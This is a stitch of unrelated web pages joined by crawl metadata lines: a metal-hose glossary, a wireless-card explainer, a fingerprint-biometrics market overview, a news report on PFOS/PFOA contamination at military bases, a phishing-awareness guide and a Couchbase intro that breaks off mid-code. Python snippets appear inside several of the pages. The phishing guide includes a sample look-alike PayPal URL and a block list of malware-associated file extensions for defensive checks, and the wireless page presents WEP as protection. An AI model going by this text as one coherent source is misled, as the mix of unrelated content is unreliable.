Exposed Length: The amount of active (exposed) hose in an assembly. Does not include the length of fittings and ferrules.
Fatigue: Failure of the metal structure associated with, or due to, the flexing of metal hose or bellows.
Ferrule: (See definition for Braid Sleeve)
Fitting: A loose term applied to the nipple, flange, union, etc., attached to the end of a metal hose.
Flat Braid: Has a braid angle greater than 45° (See Braid Angle).
Flow Rate: Pertains to a volume of media being conveyed in a given time period, e.g., cubic feet per hour, pounds per second, gallons per minute, etc.
Frequency: The rate of vibration or flexure of a hose in a given time period, e.g., cycles per second (CPS), cycles per minute (CPM), cycles per day (CPD), etc.
Galvanic Corrosion: Corrosion that occurs on the less noble of two dissimilar metals in direct contact with each other in an electrolyte, e.g., water, sodium chloride in solution, sulphuric acid, etc.
Guide (For Piping): A device that supports a pipe radially in all directions, but allows free longitudinal movement.
Hardware: A loose term used to describe parts of a hose assembly other than the hose and braid, e.g., fittings, collars, valves, etc.
Helical: Used to describe a type of corrugated hose having one continuous convolution resembling a screw thread.
Helical Wire Armor: To provide additional protection against abrasion under rough operating conditions, metal hoses can be supplied with an external round or oval section wire spiral.
Inside Diameter: This refers to the free cross section of the hose and (in most cases) is identical to the nominal diameter.
Installation: Referring to the installed geometry of a hose assembly.
Interlocked Hose: Formed from profiled strip and wound into flexible metal tubing with no subsequent welding, brazing, or soldering. May be made pressure-tight by winding in strands of packing.
Intermittent Bend Radius: The designation for a radius used for non-continuous operation. Usually an elastic radius.
Lap Weld (LW): Type of weld in which the ends or edges of the metal overlap each other and are welded together.
Liner: Flexible sleeve used to line the I.D. of hose when the velocity of gaseous media is in excess of 180 ft. per second.
Loop Installation: The assembly is installed in a loop or “U” shape, and is most often used when frequent and/or large amounts of motion are involved.
Mechanical Fitting or Reusable Fitting: A fitting not permanently attached to a hose which can be disassembled and used again.
Medium (Singular)/Media (Plural): The substance(s) being conveyed through a piping system.
Minimum Bend Radius: The smallest radius to which a hose can be bent without suffering permanent deformation of its convolutions.
Misalignment: A condition in which two points, intended to be connected, will not mate due to their being laterally out of line with each other.
Nominal Diameter: A term used to define the dimensions of a component. It indicates the approximate inside diameter.
Offset – Lateral, Parallel, & Shear: The amount that the ends of a hose assembly are displaced laterally in relation to each other as the result of connecting two misaligned terminations in a piping system, or intermittent flexure required in a hose application.
Operating Conditions: The pressure, temperature, motion, media, and environment that a hose assembly is subjected to.
Outside Diameter: This refers to the external diameter of a metal hose, measured from the top of the corrugation or braiding.
Penetration (Weld): The percentage of wall thickness of the two parts to be joined that is fused into the weld pool in making a joint. Our standard for penetration of the weld is 100 percent, in which the weld goes completely through the parent metal of the parts to be joined and is visible on the opposite side from which the weld was made.
Percent Of Braid Coverage: The percent of the surface area of a hose that is covered by braid.
Permanent Bend: A short radius bend in a hose assembly used to compensate for misalignment of rigid piping, or where the hose is used as an elbow. Hose so installed may be subjected to minor and/or infrequent vibration or movement.
Pipe Gap: The open space between adjacent ends of two pipes in which a hose assembly may be installed.
Pitch: The distance between the peaks of two adjacent corrugations.
Ply, Plies: The number of individual thicknesses of metal used in the construction of the wall of a corrugated hose.
Pressure: Usually expressed in pounds per square inch (PSI) and, depending on service conditions, may be applied internally or externally to a hose.
- Absolute Pressure – A total pressure measurement system in which atmospheric pressure (at sea level) is added to the gage pressure, and is expressed as PSIA.
- Atmospheric Pressure – The pressure of the atmosphere at sea level which is 14.7 PSI, or 29.92 inches of mercury.
- Burst Pressure (Actual And Rated)
- Actual – Failure of the hose determined by the laboratory test in which the braid fails in tensile, or the hose ruptures, or both, due to the internal pressure applied. This test is usually conducted at room temperature with the assembly in a straight line, but for special applications, can be conducted at elevated temperatures and various configurations.
- Rated – A burst value which may be theoretical, or a percentage of the actual burst pressure developed by laboratory test. It is expected that, infrequently, due to manufacturing limitations, an assembly may burst at this pressure, but would most often burst at a pressure greater than this.
- Deformation Pressure (Collapse) – The pressure at which the corrugations of a hose are permanently deformed due to fluid pressure applied internally, or, in special applications, externally.
- Feet of Water or Head Pressure – Often used to express system pressure in terms of water column height. A column of water 1 ft. high exerts a .434 PSI pressure at its base.
- Proof Pressure or Test Pressure – The maximum internal pressure which a hose can be subjected to without either deforming the corrugations, or exceeding 50 percent of the burst pressure. When a hose assembly is tested above 50 percent of its burst pressure, there often is a permanent change in the overall length of the assembly, which may be undesirable for certain applications.
- PSIA – Pounds per square inch absolute.
- PSIG – Pounds per square inch gauge.
- Pulsating Pressure – A rapid change in pressure above and below the normal base pressure, usually associated with reciprocating type pumps. This pulsating pressure can cause excessive wear between the braid and the tops of the hose corrugations.
- Shock Pressure – A sudden increase of pressure in hydraulic or pneumatic system, which produces a shock wave. This shock can cause severe permanent deformation of the corrugations in a hose as well as rapid failure of the assembly due to metal fatigue.
- Static Pressure – A non-changing constant pressure.
- Working Pressure – The pressure, usually internal, but sometimes external, imposed on a hose during operating conditions.
Profile: Used in reference to the contour rolled into strip during the manufacture of stripwound hose, or to the finished shape of a corrugation formed from a tube by the “bump-out”, “sink” or roll forming processes used in making corrugated hose.
Random Motion: The non-cyclic uncontrolled motion of a metal hose, such as occurs in manual handling.
Reusable Fitting: (See Mechanical Fitting)
Safety Factor: The relationship of working pressure to burst pressure.
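Pulling together a few of the pressure terms defined above, here is a small illustrative calculation. The figures are invented for the example, and the safety factor is shown as the commonly quoted burst-to-working ratio; always rely on the manufacturer's rated values:

```python
ATMOSPHERIC_PSI = 14.7          # atmospheric pressure at sea level
PSI_PER_FOOT_OF_WATER = 0.434   # pressure exerted at the base of a 1 ft water column

def psia_from_psig(psig):
    """Absolute pressure = gauge pressure + atmospheric pressure."""
    return psig + ATMOSPHERIC_PSI

def head_to_psi(feet_of_water):
    """Convert a water column height (head pressure) to PSI at its base."""
    return feet_of_water * PSI_PER_FOOT_OF_WATER

def safety_factor(burst_psi, working_psi):
    """Relationship of burst pressure to working pressure, e.g. 4.0 means 4:1."""
    return burst_psi / working_psi

print(psia_from_psig(100))       # 100 PSIG -> 114.7 PSIA
print(head_to_psi(50))           # 50 ft of water -> about 21.7 PSI
print(safety_factor(1500, 375))  # 4.0, i.e. a 4:1 safety factor
```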
Scale: An oxide; generally refers to the oxide found in a hose assembly, brought about by surface conditions or welding.
Seamless: Used in reference to a corrugated metal hose made from a base tube that does not have a longitudinal seam as in the case of a butt welded or lap welded tube.
Squirm: A form of failure in which the hose deforms into an “S” or “U” bend. It occurs when excessive internal pressure is applied to unbraided corrugated hose, or when a braided hose has been axially compressed, loosening the braid, and is then pressurized. This is particularly common with long lengths of braided hose subjected to manual or mechanical handling.
Strand(s): Individual groups of wires in a braid. Each group is supplied from a separate carrier in the braiding machine.
Stress Corrosion: A form of corrosion in stainless steel normally associated with chlorides.
TIG Weld: The tungsten inert gas welding process, sometimes referred to as shielded arc. The common trade name is Heliarc.
Traveling Loop: A general classification of bending, wherein the hose is installed to a U-shaped configuration.
- Class A Loop – An application wherein the radius remains constant and one end of the hose moves parallel to the other end of the hose.
- Class B Loop – A condition wherein a hose is installed in a U-shaped configuration and the ends move perpendicular to each other so as to enlarge or decrease the width of the loop.
Torque (Torsion): A force that produces, or tends to produce, rotation of or torsion through one end of a hose assembly while the other end is fixed.
Velocity: The speed at which the medium flows through the hose, usually specified in feet per second.
Velocity Resonance: The sympathetic vibration of convolutions due to buffeting of high velocity gas or air flow.
Vibration: Low amplitude motion occurring at high frequency.
Welding: The process of localized joining of two or more metallic components by heating their surfaces to a state of fusion, or by fusion with the use of additional filler materials.
Wireless Internet cards provide your PC or other type of mobile device with wireless connectivity to the Internet. Some devices come already equipped with a wireless Internet card, while others require you to insert one in order to establish Internet connectivity. The type of Internet access you establish depends upon the wireless router that provides the signal, since routers work on different channels to prevent interference.
Wireless Internet cards are also called wireless Local Area Network (LAN) cards because they help you establish connectivity to a nearby wireless network. The wireless Internet card provides a way for your PC to automatically find the nearest wireless network to help you access the Internet.
Anatomy of Wireless Internet
If you understand how wireless Internet works, it is easier to understand the role that wireless Internet cards play in establishing Internet access. Wireless connectivity works through radio waves, as opposed to transferring data over a phone line or DSL cable.
When you hear of hot spots, this refers to a wireless access point that delivers an Internet signal via a wireless router. The router receives the Internet connection from the Internet Service Provider and then broadcasts the radio waves within a specific designated distance so you can pick up the signal with the wireless Internet card in your PC.
Purpose of the Wireless Internet Card
The wireless Internet card is inserted into your PC, and it uses a small antenna to pick up the wireless signal for your PC to read. Some PCs come already equipped with a wireless Internet card, which means they are ready to accept the nearest Internet signal from the router or wireless access point. If your PC is not WiFi enabled, you can purchase a wireless Internet card to equip the PC to accept a wireless signal from the nearest access point.
Wireless Internet Card Operation
Wireless Internet cards operate at higher frequencies than broadcast radio to enable a faster rate of data transfer. Additionally, the cards communicate with the router on different channels to reduce the chances of interference in a public access location. All wireless Internet cards follow the 802.11 standard set forth by the Institute of Electrical and Electronics Engineers. There are different variations of this standard which determine different speeds of data transfer: 802.11b, 802.11g and, most recently, 802.11n.
WEP vs. WPA Protection
Most wireless Internet cards offer some type of protection in addition to helping you achieve wireless connectivity. If your mobile device is not equipped with a wireless card, look for a wireless card that supports either Wired Equivalent Privacy (WEP) or WiFi Protected Access (WPA). WEP helps to protect your data from hackers and other unscrupulous people who eavesdrop on wireless networks, especially unprotected public access networks. If you want more security, WPA provides a higher grade of encryption than WEP by using encryption keys that change on a frequent basis, which helps prevent hackers from intercepting your data during transmission over a wireless network.
Keep in mind that WEP or WPA reduces your chances of being eavesdropped on; however, data interception may still occur on public access networks. This is why it is important to play it safe and avoid entering passwords or accessing your financial records over a public network. Save these tasks for when you are connected to a more secure network.
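If you are curious which security scheme nearby networks advertise, most operating systems will show it. The rough sketch below shells out to the Linux NetworkManager tool, assuming the nmcli utility is installed; on Windows the equivalent information comes from netsh wlan show networks:

```python
import subprocess

# Ask NetworkManager for visible networks and the security they advertise
# (WEP, WPA1, WPA2, or nothing for an open network). Linux with nmcli only.
output = subprocess.run(
    ["nmcli", "-t", "-f", "SSID,SECURITY", "device", "wifi", "list"],
    capture_output=True, text=True, check=True,
).stdout

for line in output.strip().splitlines():
    ssid, _, security = line.partition(":")
    if not ssid:
        continue  # hidden network, no broadcast name
    label = security if security else "open (no encryption)"
    print(f"{ssid:30} {label}")
```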
Different Types of Wireless Internet Cards
There are different types of wireless cards that install either internally or externally on your PC. If you have a desktop PC, chances are it uses a PCI (Peripheral Component Interconnect) wireless adapter, a card that fits into an internal expansion slot and provides the PC with wireless capability.
A PCMCIA wireless adapter is designed for a laptop PC and either fits into a PCMCIA slot or comes pre-installed when you purchase your laptop. If your laptop does not have this type of capability, you can use a compact wireless Internet card that plugs into the USB port on your PC.
Purchasing a Wireless Internet Card
If you are looking to purchase a wireless Internet card, you must choose one that is compatible with the operating system you use, such as Windows or Mac. You should also decide what Internet speed is appropriate for your needs and then choose a wireless card that suits your purpose. Wireless cards vary in price according to the speed of data transfer.
This information should provide you with the basic understanding you need of how wireless Internet cards work and how they provide mobile connectivity for your laptop PC and other mobile devices.
In recent years, biometric identification systems, and fingerprint recognition systems in particular, have been widely adopted by both government and private outfits. Governments across nations have been using this technology for purposes like civil identity, law enforcement, border control, access control, employee identification, attendance, etc. Business setups have been using it to save time by streamlining various processes like employee identification, physical and logical access control, user authentication, safeguarding cloud communication, etc. Biometric systems have been embraced by organizations of all sizes and shapes regardless of their industry type and vertical. The availability of fingerprint sensors in affordable mobile devices and government national ID programs have particularly brought biometrics to the common man and have increased awareness as well as acceptance. Biometric systems are also getting more and more inexpensive due to widespread implementation and an increasing rate of adoption.
Evolution of biometric systems over generations
Early generations of biometric devices were not as efficient as modern ones. They were bulky, heavy and required supervision during operation. They were also not as fast as current devices, and required calibration for accuracy. PC integration was not available in first generation biometric devices and usage was limited to law enforcement applications. The second generation of biometric devices brought some improvements over the first, but devices were still expensive and had high FRR and/or FAR. Finger preparation was also required prior to scanning, as sensors were not as technologically advanced as modern sensors. Only optical sensors were available in recognition systems; other sensing methods were either unavailable or under development. For second generation biometric systems, applications were limited to high security computing in vertical applications and building access control.
The current generation of biometric systems is available with sensors leveraging different techniques, like capacitance, thermal, etc., to read fingerprints. They come with the ability to detect liveness and do not require manual calibration. Current biometric recognition systems are considerably faster than earlier generations. They have SDKs available for PCs and come with encryption support. Mass production induced by the increasing adoption rate has not only slashed prices of biometric systems, but also encouraged their usage in mainstream identification and authentication methods. Now billions of people use biometric identification and authentication in some way or other on a daily basis. From unlocking doors to unlocking phones, biometrics is always at work.
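FRR (false rejection rate) and FAR (false acceptance rate), mentioned above, are the standard error rates used to compare recognition systems. The sketch below shows how they can be computed from comparison scores, assuming you already have scores for genuine and impostor attempts and that a higher score means a better match (the score values here are toy data):

```python
def far_frr(genuine_scores, impostor_scores, threshold):
    """FAR: fraction of impostor attempts scoring at or above the threshold.
    FRR: fraction of genuine attempts scoring below it."""
    far = sum(s >= threshold for s in impostor_scores) / len(impostor_scores)
    frr = sum(s < threshold for s in genuine_scores) / len(genuine_scores)
    return far, frr

# Toy score sets for illustration only.
genuine = [0.91, 0.87, 0.95, 0.62, 0.88]
impostor = [0.12, 0.45, 0.71, 0.08, 0.33]

for t in (0.5, 0.7, 0.9):
    far, frr = far_frr(genuine, impostor, t)
    print(f"threshold {t}: FAR={far:.0%}, FRR={frr:.0%}")
```

Raising the threshold trades false acceptances for false rejections, which is why vendors usually quote both figures together.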
Increasing adoption rate – decreasing prices
Mass production cuts down prices, and that is exactly what is happening with biometric recognition systems right now. Increasing numbers of implementations made mass production of biometric systems imperative and slashed prices. A biometric system's price may depend on factors like brand, certifications, waterproofing, type of sensor, etc. A small USB fingerprint scanner can cost as little as $50, while a sophisticated ten-finger scanner with live finger detection ability can cost $2500. Increasing production and competition are expected to lower prices further. The average selling price of global mobile fingerprint sensor volumes is estimated to drop to $2 per unit in 2020, down from as high as $5.50 in 2014.
Increasing adoption has helped bring down the cost of biometric devices. Factors like economies of scale, increasing production and electronic components getting cheaper have helped biometric systems become affordable for small businesses and even for individual applications. Falling prices are particularly evident in the case of fingerprint scanners. Earlier, only high-end or flagship mobile phones were equipped with fingerprint sensors, but now even a $100 smartphone offers a capacitive fingerprint sensor. Fingerprint recognition systems, which were earlier used only in high security facilities or restricted areas, are now commonly seen everywhere. Be it office doors, server rooms, schools, banks, POS, etc., fingerprint scanners have made their way into everyday life. Due to mass production, the building blocks of biometric systems are getting cheaper, and new entrants are offering very competitive prices. Technological enhancements and the introduction of new hardware also slash prices of previous iterations.
There are various elements to consider before choosing any modality to employ for a biometric application. The level of security required, the cost of the biometric system, return on investment, etc., are some of the elements that may become a deciding factor in employing a biometric recognition method.
Common comparison criteria for biometric modalities include accuracy, cost, size of template, long-term stability and security level.
Fingerprinting: the biometric method of choice
Different biometric recognition methods offer different sets of features, advantages and disadvantages. Cost is also an important factor to consider while choosing a biometric recognition system. For high security applications, multi-factor authentication or a multi-modal biometric implementation can be considered, while low security applications can be implemented with a single biometric modality. Multi-modal biometric applications may multiply the investment required, so there has to be a balance, and a thorough return-on-investment study may be required before taking up multi-modal biometric recognition. Fingerprinting is the most popular modality among all biometric recognition methods. Being inexpensive and easy to implement and use, it has the most penetration in authentication and access control applications as well as consumer electronics like mobile phones and portable devices. Fingerprint scanners make use of sensors to scan a pattern. These sensors use different techniques to read and produce an image of the fingerprint pattern.
Optical sensors capture the image of a fingerprint with a specialized digital camera setup. This is the most common type of fingerprint sensor and is widely available at low prices. Optical sensors have shortcomings: scan quality is affected by dirty fingers, and they are easier to trick than other types of sensors.
Capacitive scanners make use of a pixel array of capacitors, instead of visible light, to produce an image of the fingerprint. Capacitive scanners are hard to fool because they cannot be tricked with fingerprint images. They are more expensive than optical sensors.
Ultrasonic scanners use very high frequency sound waves to read the pattern of a fingerprint. Ultrasonic sound waves reflected from the fingertip surface are measured by the sensor and an image of the fingerprint pattern is produced. The performance of ultrasonic sensors stays unaffected by dirt on the finger surface, as they do not capture an image the way optical sensors do.
Thermal line sensors
These sensors read a fingerprint pattern by measuring temperature variation across fingertip ridges and valleys. They require the finger to be moved over a narrow, linearly arranged array of thermal sensors. They are small in size and rely on finger movement to measure fingerprint patterns.
Cost of a fingerprint recognition system can be highly dependent on the sensor type used in the device.
Use of fingerprint scanners rose steeply during the 2010s. Consumer electronics, especially mobile phones and tablets, made extensive use of fingerprint sensors.
List of popular fingerprint devices
- Hamster Plus ($73.00, ★★★★☆): Secugen Hamster Plus is a versatile fingerprint reader with Auto-On™ and Smart Capture™, featuring a comfortable, ergonomic design.
- Hamster IV ($89.00, ★★★★☆): Secugen Hamster IV fingerprint reader is built with the industry’s most rugged and advanced optical sensor using patented SEIR fingerprint biometric technology.
- BioMini Plus 2 ($135.00, ★★★★★): BioMini Plus 2 is a high performance fingerprint authentication scanner which features Suprema’s award-winning algorithm.
- Hamster Pro 20 ($82.00, ★★★★☆): High-performance, maintenance-free optical fingerprint sensor with Auto-On™ & Smart Capture™ features.
- Lumidigm M301 ($233.00, ★★★★★): M301 is a high-performing stand-alone biometric reader equipped with Lumidigm’s world-class multi-spectral imaging technology.
- Columbo: Comes with a full featured SDK to enable effective integration into applications. Available in desktop and embedded module (OEM) versions.
- Fingkey Hamster I DX ($85.00, ★★★★☆): Fingkey Hamster I DX USB fingerprint reader for precise user authentication through the distinct algorithm.
- Hamster Pro ($45.00, ★★★☆☆): Hamster Pro features advanced optical sensors engineered with patented technology.
- Watson Mini ($350.00, ★★★★★): Small, light and fast dual fingerprint scanner that enables fingerprint capture in standalone applications in combination with smart phones and tablets.
- World’s smallest, lightest, and fastest two print (dual) fingerprint live scanner featuring Light Emitting Sensor technology.
- Fingkey Hamster II ($99.00, ★★★★☆): Nitgen Fingkey Hamster II DX is a cutting-edge fingerprint sensor that prevents use of fake fingerprints.
- Fingkey Hamster III ($115.00, ★★★★☆): Fingkey Hamster III fingerprint scanner can be connected to a PC along with a normal mouse and used for all areas involving passwords.
- eNBioScan-D Plus ($700.00, ★★★★☆): eNBioScan-D Plus dual fingerprint scanner delivers fast, accurate and reliable results for identification, verification and enrollment programs.
- eNBioScan-F: An FBI PIV certified advanced fingerprint recognition scanner with a large fingerprint input window.
Both businesses and governments have recognized the potential of biometric recognition systems and are leveraging them for various identification and authentication purposes. With successful adoption on various fronts like access control, civil identification, border control, law enforcement, etc., it can be said that biometrics is growing rapidly and has good prospects for the future. Global adoption and successful implementation across industries have shown that biometrics is the way forward. Market intelligence companies also predict exponential growth of biometric recognition in the future.
Newer trends like cloud biometrics are set to take biometric affordability to the next level. According to an estimate by Frost and Sullivan, market revenue for fingerprint authentication on mobile devices is expected to increase from US$52.6 million in 2013 to US$396 million in 2019. Authentication with BaaS (biometrics as a service) on mobile devices can safeguard crucial operations like banking transactions, authorization of payments, e-commerce transactions, etc. In banks, scalability is an important aspect to take care of. The launch of new branches, installation of ATMs, etc. are part of ongoing banking operations. Biometrics as a cloud service can benefit scalability-intensive industries. New ATMs with biometric capabilities will not only be more secure than traditional card- and PIN-based authentication, but also easier to deploy with cloud biometrics.
Biometrics has proved to be more efficient, faster and more secure than traditional identification practices like ID cards, access cards, PINs and passwords, which are either possession-based or knowledge-based authentication factors. Biometrics, being an inherence-based factor, eliminates the possibility of forgotten or shared passwords and the loss or theft of ID/access cards. Implementing multi-modal biometrics or multi-factor authentication with biometrics as one of the essential factors provides even greater security, which is a common requirement in high security facilities like military setups, data centers, nuclear reactors, R&D facilities, etc.
Growing adoption of biometric recognition systems across all industries and sectors, in a variety of applications, has paved the way to a huge commercial market for devices and solutions. Modern biometric systems have the ability to connect to information systems and the network. They can share data over the internet with a remote server holding a centralized biometric database. This ability allows biometrics to be offered as a service over the internet. The huge success and adoption of biometric devices has induced mass production of these devices. Once seen only in high security facilities, biometric recognition systems have reached the pockets of the common population. Today, biometric recognition systems have come to a price point where small businesses and even individuals can easily afford them for office/home security, attendance, employee/customer identification, membership management, point of sale, etc.
By Tara Copp, Military Times
Bottom line: The man-made chemical compounds found in military fire-fighting foam, perfluorooctane sulfonate and perfluorooctanoic acid, known commonly as PFOS and PFOA, are hardy, toxic chemicals that do not degrade in soil or water, and can be absorbed by humans through drinking water, or through the soil or air.
The compounds even get to fetuses.
(The U.S. military is spending billions to clean up drinking water contaminated with toxic firefighting foam while continuing to use dangerous new formulas. Courtesy of The Intercept and YouTube. Posted on Feb 12, 2018.)
The study reported the chemicals have been found in umbilical cords and human breast milk.
In people, the study found that exposure could be associated with pregnancy complications, thyroid issues, liver damage, asthma, decreased responsiveness to vaccines, decreased fertility and kidney and testicular cancer.
The report’s findings on human exposure — and which looked at the whole population, not just military locations — were based on multiple studies of populations near contaminated water sources.
However, causality could not be directly established because there could have been multiple ways a person could have been exposed instead of just drinking water.
The compounds are present in everyday household goods, but are concentrated in military firefighting foam.
But the study also looked at the compounds’ effects on animals.
Based on 187 peer-reviewed studies where laboratory rats or other animals directly ingested the compounds, the results were more dire.
At the highest dosages, the animals experienced liver or other organ failure.
At significantly lower exposure levels the subject rats survived, but pregnant lab rats showed increased prenatal loss and increased loss of pups after birth.
Long-term effects at lower doses included lasting impacts to rat testes and ovaries.
The “Toxicological Profile for Perfluoroalkyls” was produced by the Department of Health and Human Services’ Agency for Toxic Substances and Disease Registry (ATSDR).
It was released Thursday for public comment. To leave a public comment on the report, the study directed respondents to go to regulations.gov.
There the study can be searched by name.
Over the last several weeks Military Times has interviewed former service members or family members who have reported cancers, miscarriages and other chronic illnesses they suspect may be tied to drinking contaminated military base water.
(A United States expert is warning that New Zealand’s acceptable levels for drinking water contamination from toxic firefighting foam chemicals are way too high. Courtesy of RNZ and YouTube. Posted on Dec 21, 2017.)
On military bases, the compounds seeped into the soil and water through the use of fire fighting foams.
After the foams were sprayed on aircraft, the remaining foam and chemicals would just be dumped onto the ground, or into a drain, multiple former airmen have told Military Times.
“It was just draining into whatever drains were around,” said Paul Cyman, who served as an Air Force firefighter from 1969 to 1973.
“It would go into the storm drains. There was no containment at all.”
The report had been withheld by the administration, which reportedly called it a “public relations nightmare,” according to news reports.
After a bi-partisan push by lawmakers demanding its release, the report was released for comment Thursday.
“Based on this information, I encourage federal, state, and local environmental regulators to examine whether they are appropriately communicating the risks presented by and adequately addressing the presence of PFOS and PFOA in drinking water,” said Rep. Mike Turner, R-Ohio.
Sen. Jeanne Shaheen, D-N.H., who represents the former and contaminated Pease Air Force Base, got funding passed in the 2018 and 2019 defense bills for a nationwide study that will look at eight to 10 military bases to study the effects of PFOS and PFOA exposure.
The 2019 bill also supports creation of a national registry for service members, their families and the public to report exposure to the contaminants.
“I’m glad the administration heeded the bipartisan call in Congress and finally published these reports,” Shaheen said.
(Learn More. It’s in rain gear, cookware, carpets, firefighting foam, the drinking water of at least six million people, and more likely than not, it’s in your blood. Learn more about PFAS chemicals and what you can do to clean up PFAS-contaminated drinking water in your community. Courtesy of ToxicsAction and YouTube. Posted on Mar 29, 2018.) | <urn:uuid:dc49c006-06ad-480d-829d-6f1df4dc0a1e> | CC-MAIN-2022-40 | https://americansecuritytoday.com/withheld-study-base-water-toxins-not-good-learn-videos/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00141.warc.gz | en | 0.966509 | 975 | 2.90625 | 3 |
Why Phishing Awareness is Vital to Organizations
Successful phishing attacks give attackers a foothold in corporate networks, access to vital information such as intellectual property, and in some cases money. The question is how to generate phishing awareness and train your team to spot a phishing email. There are numerous types of phishing, but ultimately it is any type of attack by email that is designed to result in the recipient taking a specific course of action. This could be clicking a link that leads to a compromised website, opening a malware-laden attachment, or divulging valuable information such as usernames and passwords.
Look for a Hook in Phishing Emails
Increasingly, phishing emails are carefully researched and contrived to target specific recipients. Given the number and intensity of data breaches in recent years there is a wealth of information available to phishers to use when honing their prose, making it even tougher to spot signs of a phishing email and discern fact from fiction.
The increasing sophistication of phishing attacks makes it difficult for technology to identify email-borne threats and block them. However, phishing emails typically have a range of “hooks” which, if spotted by the recipient, can prevent the attack from being successful. The following are some of the hooks – or signs of a phishing email – that can indicate an email is not as genuine as it appears to be.
10 Most Common Signs of a Phishing Email
1. An Unfamiliar Tone or Greeting
The first thing that usually arouses suspicion when reading a phishing message is that the language isn’t quite right – for example, a colleague is suddenly over familiar, or a family member is a little more formal. For instance, if I personally were to receive an email from Cofense’s CTO that began with “Dear Scott,” that would immediately raise a red flag. In all of our correspondence over the years, he has never begun an email with that greeting so it would feel wrong. If a message seems strange, it’s worth looking for other indicators that this could be a phishing email.
2. Grammar and Spelling Errors
One of the more common signs of a phishing email is bad spelling and the incorrect use of grammar. Most businesses have the spell check feature on their email client turned on for outbound emails. It is also possible to apply autocorrect or highlight features on most web browsers. Therefore, you would expect emails originating from a professional source to be free of grammar and spelling errors.
3. Inconsistencies in Email Addresses, Links & Domain Names
Another simple way to identify a potential phishing attack is to look for discrepancies in email addresses, links and domain names. For example, it is worth checking against previous correspondence that originating email addresses match. If a link is embedded in the email, hover the pointer over the link to verify what ‘pops up’. If the email is allegedly from PayPal, but the domain of the link does not include “paypal.com,” that’s a huge giveaway. If the domain names don’t match, don’t click.
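One rough way to automate this check is to pull every link out of a message body and compare each link's host against the domain the mail claims to come from. The sketch below is illustrative only; the sample HTML and sender domain are invented, and production mail filters do far more than this:

```python
import re
from urllib.parse import urlparse

def suspicious_links(html_body, claimed_sender_domain):
    """Return links whose host does not end with the sender's claimed domain."""
    links = re.findall(r'href=["\'](http[^"\']+)["\']', html_body, re.IGNORECASE)
    flagged = []
    for link in links:
        host = urlparse(link).hostname or ""
        # Naive suffix check: a real filter should compare registered domains,
        # since "notpaypal.com" would also pass this test.
        if not host.endswith(claimed_sender_domain.lower()):
            flagged.append(link)
    return flagged

body = '<a href="http://paypal.com.account-check.example.net/login">Verify your account</a>'
print(suspicious_links(body, "paypal.com"))
# ['http://paypal.com.account-check.example.net/login'] -- the real host is example.net
```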
4. Threats or a Sense of Urgency
Emails that threaten negative consequences should always be treated with suspicion. Another tactic is to use a sense of urgency to encourage, or even demand, immediate action in a bid to fluster the receiver. The scammer hopes that by reading the email in haste, the content might not be examined thoroughly so other inconsistencies associated with a phishing campaign may pass undetected.
5. Suspicious Attachments
If an email with an attached file is received from an unfamiliar source, or if the recipient did not request or expect to receive a file from the sender of the email, the attachment should be opened with caution. If the attached file has an extension commonly associated with malware downloads (.zip, .exe, .scr, etc.) – or has an unfamiliar extension – recipients should flag the file to be virus-scanned before opening.
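A simple guard is to flag attachment filenames whose extensions are commonly associated with malware before anyone opens them. The sketch below is illustrative; the extension list is an assumption, not an exhaustive policy:

```python
import os

# Extensions commonly abused to deliver malware; extend to suit your own policy.
RISKY_EXTENSIONS = {".exe", ".scr", ".zip", ".js", ".vbs", ".bat", ".cmd"}

def flag_risky_attachments(filenames):
    """Return the attachments that should be virus-scanned before opening."""
    flagged = []
    for name in filenames:
        ext = os.path.splitext(name.lower())[1]
        if ext in RISKY_EXTENSIONS or ext == "":  # unfamiliar/no extension is also suspect
            flagged.append(name)
    return flagged

print(flag_risky_attachments(["invoice.pdf", "statement.zip", "update.scr"]))
# ['statement.zip', 'update.scr']
```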
6. Unusual Request
Leading on from the point above, if the email is asking for something to be done that is not the norm, then that too is an indicator that the message is potentially malicious. For example, if an email claims to be from the IT team asking for a program to be installed, or a link to patch the PC followed, yet this type of activity is typically handled centrally, that’s a big clue that you have received a phishing email and should not follow the instructions.
7. Short and Sweet
While many phishing emails will be stuffed with details designed to offer a false sense of security, some phishing messages are sparse on information, hoping to trade on their ambiguity. For example, a scammer spoofing an email from Jane at a preferred vendor who emails the company once or twice weekly might send the vague message ‘here’s what you requested’ with an attachment titled ‘additional information’ in hopes of getting lucky.
8. Recipient Did Not Initiate the Conversation
Because phishing emails are unsolicited, an often-used hook is to inform the recipient he or she has won a prize, will qualify for a prize if they reply to the email, or will benefit from a discount by clicking on a link or opening an attachment. In cases where the recipient did not initiate the conversation by opting in to receive marketing material or newsletters, there is a high probability that the email is suspect.
9. Request for Credentials, Payment Information or Other Personal Details
One of the most sophisticated types of phishing emails is when an attacker has created a fake landing page that recipients are directed to by a link in an official-looking email. The fake landing page will have a login box or request that a payment is made to resolve an outstanding issue. If the email was unexpected, recipients should visit the website from which the email has supposedly come by typing in the URL – rather than clicking on a link – to avoid entering their login credentials on the fake site or making a payment to the attacker.
10. See Something, Say Something
Identification is the first step in the battle against phishers. However, chances are that if one employee is receiving phishing emails, others are as well. Organizations need to promote phishing awareness and condition employees to report signs of a phishing email – it’s the old adage of “If you see something, say something,” to alert security or the incident response team.
A complication of this is then sifting through the various reports to eliminate false positives. So, how can an organization stop phishing emails and identify phishing attacks? One method is to prioritize alerts received from users who have a history of positively identifying phishing attacks. These employee-sourced, prioritized reports provide the incident response (IR) team and security operations analysts with the information needed to rapidly respond to potential phishing attacks and mitigate the risk from those that may fall prey to them. | <urn:uuid:c9ef08ef-1ac3-424a-852d-839d118cbd2a> | CC-MAIN-2022-40 | https://cofense.com/knowledge-center/signs-of-a-phishing-email/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00141.warc.gz | en | 0.945459 | 1,495 | 2.609375 | 3 |
Couchbase is a distributed database management system created by the company Couchbase, Inc. Couchbase stores data in RAM for faster access times, but also replicates that data across servers for redundancy and parallelization. Data in the database is stored as documents and can be queried via an index or key/value pairs.
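As a rough sketch of what that document and key/value model looks like from an application, here is how a client might store and read a document with the Couchbase Python SDK (3.x/4.x-style API). The connection string, credentials, bucket name and keys are placeholders, and import paths can vary slightly between SDK versions:

```python
from couchbase.auth import PasswordAuthenticator
from couchbase.cluster import Cluster
from couchbase.options import ClusterOptions

# Connect to a cluster (placeholder address and credentials).
cluster = Cluster(
    "couchbase://localhost",
    ClusterOptions(PasswordAuthenticator("app_user", "app_password")),
)
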